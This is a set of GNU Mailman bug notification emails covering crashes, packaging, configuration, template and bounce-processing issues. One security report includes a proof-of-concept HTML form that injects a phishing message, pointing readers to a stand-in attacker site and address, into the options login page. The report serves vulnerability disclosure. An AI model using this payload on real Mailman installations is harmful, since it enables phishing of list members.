Public bug reported:
When a message contains an invalud unicode sequence in its header,
qrunner flat out crashes on that:
May 17 15:32:20 2015 (981) Uncaught runner exception: 'utf8' codec can't decode byte
0xe9 in position 18: invalid continuation byte
May 17 15:32:20 2015 (981) Traceback (most recent call last):
File "/var/lib/mailman/Mailman/Queue/Runner.py", line 119, in _oneloop
self._onefile(msg, msgdata)
File "/var/lib/mailman/Mailman/Queue/Runner.py", line 190, in _onefile
keepqueued = self._dispose(mlist, msg, msgdata)
File "/var/lib/mailman/Mailman/Queue/IncomingRunner.py", line 130, in _dispose
more = self._dopipeline(mlist, msg, msgdata, pipeline)
File "/var/lib/mailman/Mailman/Queue/IncomingRunner.py", line 153, in _dopipeline
sys.modules[modname].process(mlist, msg, msgdata)
File "/var/lib/mailman/Mailman/Handlers/CookHeaders.py", line 239, in process
i18ndesc = uheader(mlist, mlist.description, 'List-Id', maxlinelen=998)
File "/var/lib/mailman/Mailman/Handlers/CookHeaders.py", line 65, in uheader
return Header(s, charset, maxlinelen, header_name, continuation_ws)
File "/usr/lib/python2.7/email/header.py", line 183, in __init__
self.append(s, charset, errors)
File "/usr/lib/python2.7/email/header.py", line 267, in append
ustr = unicode(s, incodec, errors)
UnicodeDecodeError: 'utf8' codec can't decode byte 0xe9 in position 18: invalid
continuation byte
May 17 15:32:20 2015 (981) SHUNTING:
1431869540.389822+156779307d54473d0eb732994bb67eee95733285
A solution for this specific case is to have Mailman/Handlers/CookHeaders.py pass the erorrs='replace' parameter.
I would say that this is actually a bug in python-email, since I think it doesn't make sense to set errors to "strict" rather than something like "replace" when the intention is to parse stuff so free-formed, under-specd
and user-controlled as email. Nonetheless, Mailman already sets errors='replace' in some places so it might aswell add it here.
** Affects: mailman
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1462755
Title:
qrunner crashes on invalid unicode sequence
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1462755/+subscriptions
Public bug reported:
We need a script, documentation, or other procedure to help people
migrate from Mailman 2 to Mailman 3.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: mailman3
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/965532
Title:
Need a script to upgrade from MM2 to MM3
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/965532/+subscriptions
Public bug reported:
Mailman 3 is essentially five projects:
Mailman Core
Postorius - The Web UI for Mailman
Mailman Client - The REST API Client
HyperKitty - The Archiver for Mailman
Mailman Bundler - Installer for Mailman Suite including all above projects
URL: https://www.gnu.org/software/mailman/
** Affects: mailman
Importance: Undecided
Status: New
** Affects: ubuntu
Importance: Undecided
Status: New
** Affects: debian
Importance: Unknown
Status: Unknown
** Tags: needs-packaging
** Bug watch added: Debian Bug tracker #799292
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=799292
** Also affects: debian via
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=799292
Importance: Unknown
Status: Unknown
** Also affects: mailman
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1609516
Title:
[needs-packaging] GNU Mailman v3
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1609516/+subscriptions
Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses dns queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost" delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2(a)mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
setting localhost in postfix_lmtp breaks delivery
https://bugs.launchpad.net/bugs/544477
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/
exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker(a)badsite.com"
message will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions
Public bug reported:
>From the "Welcome email txt file" in the option "Edit the public HTML
pages and text files",
This code parse incorrectly:
Welcome to the %(description)s mailing list!
%(welcome)s
It produces:
Welcome to the %(description)s mailing list!
Here is where the welcome variable got substituted but the description variable did not. Have fun.
The description variable is not being substituted in the email body.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: description variable
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1872840
Title:
(description)s variable not substituted in emails
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1872840/+subscriptions
Public bug reported:
We have seen (very rarely) cases where a recipient address has a quoted
local part such as "jr."@example.org. This results in a VERPed sender
address like list-bounces+"jr."=example.org(a)example.com which is
syntactically invalid. The VERPed sender should be "list-
bounces+jr.=example.org"@example.com in this case. I.e., the entire
VERPed sender local part should be quoted, not just the recipient local
part.
This also requires BounceRunner to recognize this and restore the
original local part.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: In Progress
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1731604
Title:
VERP fails if the recipient address local part is quoted.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1731604/+subscriptions
Public bug reported:
System: RHEL 7.7
Mailman: mailman-2.1.15-26.el7_4.1.x86_64
Description: We have 2 Mailinglist with > 7000 Members which trigger a spike in processed bounces (more than 3000 in an sinle run), followed by an Out of Memory situation in the BounceRunner and an > 20 GB bounce-event-XXXX.pck
file.
We tried to mitigate the problem by increasing the system memory, running the BoucneRunner
every minute and limiting the number of mails delivered at ounce by postfix.
But it happened again:
Dec 30 19:53:29 2019 (13392) <BounceRunner at 140395473885088>
processing 4134 queued bounces
...
Dec 30 19:53:59 mx09 kernel: [13392] 41 13392 2755797 1874474 5337 825695 0 python
...
Dec 30 19:53:59 mx09 kernel: Out of memory: Kill process 13392 (python) score 896 or sacrifice child
Dec 30 19:53:59 mx09 kernel: Killed process 13392 (python), UID 41, total-vm:11023188kB, anon-rss:7497896kB, file-rss:0kB, shmem-rss:0kB
We analyzed the bounce-event file, extracting data with "stings".
This time we extracted the postfix mail queue ids from the received headers
with our listserver. We found the following:
cat /tmp/bounce-20191230.txt | sed 's/;//' | sort | uniq -c | sort -n
1 01A7DE9314
1 10F6AE9319
1 18456E930E
1 27D0BAC960
1 3B51CE9316
1 57C2DAC992
1 5D3B2E9310
1 5EF11E9311
1 63054E9312
1 69377E9313
1 ED636E930F
2 29884E9315
2 49ECEAC98D
2 99A16A9DA7
2 (Postfix)
3 59EE1AC995
3 CEB61AC996
192 C12E9D3B48
3929 F2BEEE9318
4122 CC58AAC993
4134 6EFD1A9DA7
As the bounces the last 2 qids are from the original mail send to the list (6EFD1A9DA7),
and one of mails send by mailman to 500 members of that list (CC58AAC993).
(F2BEEE9318 and C12E9D3B48) are both bounces from members that where deliverd only once
to /usr/lib/mailman/mail/mailman bounces NAME-OF-HUGE-LIST
So from me it seems that somehow some few bounce where "multiplied" so that ~20 real
bounce produced 4134 virtual bounce.
I see the potential of a deny of service attack, as it could be used
to fill up the disk where the bounce-event files get dumped
But I don't know if this would warrant marking "This bug is a security vulnerability".
** Affects: mailman
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1859011
Title:
bounce mail processed multiple times -> oom crash of BounceRunner
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1859011/+subscriptions